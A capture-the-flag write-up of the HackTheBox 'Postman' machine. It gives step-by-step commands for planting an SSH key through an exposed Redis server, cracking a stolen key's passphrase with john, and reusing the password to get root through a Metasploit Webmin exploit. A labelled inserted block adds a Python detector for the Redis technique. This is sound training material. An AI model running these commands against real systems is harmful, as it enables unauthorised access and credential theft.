
HackTheBox - Retired - Postman



Recon:

As always, I start with a simple up/down scan on all TCP ports:
# nmap -T4 -p- -oX /root/Desktop/HTB/postman/nmapb.xml 10.10.10.160

Then I convert the XML to HTML:

xsltproc /root/Desktop/HTB/postman/nmapb.xml -o /root/Desktop/HTB/postman/nmapb.html


Ok, we see ports 22, 80, 6379 and 10000.

Let's scan just those ports with -A to fingerprint the OS and services:

nmap -T4 -A -p 22,80,6379,10000 -oX /root/Desktop/HTB/postman/nmapf.xml 10.10.10.160

Convert that to HTML too:

xsltproc /root/Desktop/HTB/postman/nmapf.xml -o /root/Desktop/HTB/postman/nmapf.html




Ok, we got:
SSH (OpenSSH 7.6p1) on port 22
HTTP (Apache 2.4.29) on port 80
Redis (4.0.9) on port 6379
Webmin (1.910) on port 10000

Let's see what's running on port 80.


Just a generic page with not much to poke at.

Let's run dirb against port 80 and see what we find.

It found some directories to poke around in: /css, /fonts, /images, /js and /Uploads.

I really like finding dirs called uploads; usually that means there is some way to upload a file to the server……



What about port 10000, Webmin?


It's running over SSL.


Needs creds..

Let's do a little digging on the Redis service.. So what is Redis?


Redis is an open source (BSD licensed), in-memory data structure store, used as a database, cache and message broker.

It has a CLI.


Let's install it:

sudo apt-get install redis

Let's see if we can connect to it.


Cool, we can… so what can we do?





Exploit:



When I come across a tool I don't have any experience with, I like to google the tool's name followed by "pentest" to see what the juicy bits are.



Inserting our own SSH key onto the server to connect up..

Sounds worth a try.




Let's start by generating our SSH key pair (saved as ./keyz so the later commands match):

ssh-keygen -t rsa -f ./keyz



Now we are going to put some padding around the pub key, just like the blog does:
(echo -e "\n\n"; cat ./keyz.pub; echo -e "\n\n") > pubkey.txt

Now we need to load the file into Redis as a key:

cat ./pubkey.txt | redis-cli -h postman.htb -x set crackit

Connect back up to Redis to save our file:

redis-cli -h postman.htb

Now this part took a while: finding out where to save the pub key.

When connected up, we were in this directory:


/var/lib/redis

I tried setting the dir to /home.. but got permission denied.

But what if this file path is the home directory for a user named redis… if we add our file to .ssh there, maybe we can get our shell?
config set dir /var/lib/redis/.ssh
config set dbfilename "authorized_keys"
save

This should take the key we put in Redis and save it as a file named "authorized_keys" in the .ssh folder.


Now we can hopefully SSH in as redis:
ssh -i ./keyz redis@postman.htb
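For the blue-team side of the Redis trick above, here is an added example (not from the original post) that parses constructed Redis MONITOR output and flags a SAVE/BGSAVE issued after CONFIG SET has pointed the dump at an unusual directory or a filename that is not an .rdb. It assumes /var/lib/redis is the server's legitimate dump directory and dump.rdb its default filename; the sample lines, client addresses and timestamps are constructed.

```python
import re

# MONITOR prints one line per command:  <unix ts> [<db> <ip:port>] "cmd" "arg" ...
MONITOR_RE = re.compile(r'^(\d+\.\d+) \[(\d+) (\S+)\] (.*)$')
ARG_RE = re.compile(r'"((?:[^"\\]|\\.)*)"')   # quoted args, backslash escapes left as-is

EXPECTED_DIR = "/var/lib/redis"   # assumed legitimate RDB location for this server

# Constructed sample: normal traffic first, then the key-drop sequence from the writeup.
SAMPLE_LINES = [
    '1574000000.000000 [0 127.0.0.1:40000] "get" "session:42"',
    '1574000001.000000 [0 127.0.0.1:40000] "bgsave"',
    '1574000010.100000 [0 10.10.14.5:51234] "set" "crackit" "\\n\\nssh-rsa AAAAB3...\\n\\n"',
    '1574000010.200000 [0 10.10.14.5:51234] "config" "set" "dir" "/var/lib/redis/.ssh"',
    '1574000010.300000 [0 10.10.14.5:51234] "config" "set" "dbfilename" "authorized_keys"',
    '1574000010.400000 [0 10.10.14.5:51234] "save"',
]

def parse_line(line):
    """Split a MONITOR line into client, command and arguments; None if it is not one."""
    m = MONITOR_RE.match(line.strip())
    if not m:
        return None
    args = ARG_RE.findall(m.group(4))
    if not args:
        return None
    return {"ts": float(m.group(1)), "client": m.group(3),
            "cmd": args[0].upper(), "args": args[1:]}

def detect_rdb_file_writes(lines):
    """Alert on any SAVE/BGSAVE issued while the dump location has been redirected."""
    # CONFIG SET is server-wide, so dir/dbfilename are tracked once, not per client.
    cfg = {"dir": EXPECTED_DIR, "dbfilename": "dump.rdb"}
    alerts = []
    for line in lines:
        ev = parse_line(line)
        if ev is None:
            continue
        if ev["cmd"] == "CONFIG" and len(ev["args"]) >= 3 and ev["args"][0].upper() == "SET":
            key = ev["args"][1].lower()
            if key in cfg:
                cfg[key] = ev["args"][2]
        elif ev["cmd"] in ("SAVE", "BGSAVE"):
            path = cfg["dir"].rstrip("/") + "/" + cfg["dbfilename"]
            if cfg["dir"].rstrip("/") != EXPECTED_DIR or not cfg["dbfilename"].endswith(".rdb"):
                alerts.append({"ts": ev["ts"], "client": ev["client"], "path": path})
    return alerts
```

MONITOR is expensive on a busy server, so in production the same logic belongs on a proxy or on audit logs rather than a permanent MONITOR session. Binding Redis to localhost, setting requirepass, and disabling CONFIG with rename-command closes this path outright.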

Alright, we have a foothold as redis..

Let's copy over LinEnum.sh to see if we can find any path for escalation.



Check this out:

A backup of a key in a folder we might have access to?





We got a private key… I just used the clipboard to copy it locally to my machine.
I changed the permissions so only my user can read it, so SSH wouldn't complain about it being too open.

I saved it as MattPriv.

 

There's a passphrase… no problem, we can get rid of that..


We can use ssh2john to convert the key into a format that john likes:


/usr/share/john/ssh2john.py ./MattPriv > johnmattpriv.txt


Now we just need to feed it to john:

sudo john --wordlist=/home/circusmonkey/rockyou.txt --format=SSH ./johnmattpriv.txt




That didn't take long: computer2008 is the passphrase for the SSH key.


It's not letting us SSH in with that password…


What about that Webmin thing we found earlier? It needed creds… hopefully Matt re-uses passwords.

And guess what?

He did; got in with Matt / computer2008.


Googling around, I found this authenticated RCE which, if it works, will give us root on the box..


Let's try it.

Fire up Metasploit and search for webmin:

use 3

Set our options.

We need to set the password, username, RHOSTS and LHOST, and set the SSL flag to true since our victim is using SSL. *** You might see I mistyped the password option.. I fixed that after Metasploit complained.


We are in as root.

Let's just grab our flags now.


The shell is not working great.


Ran the command "shell" on the session to get a better shell.


All done.

# pwd 
pwd
/home/Matt
# cat user.txt
cat user.txt
517a***************************
# cat /root/root.txt
cat /root/root.txt
a257*******************************
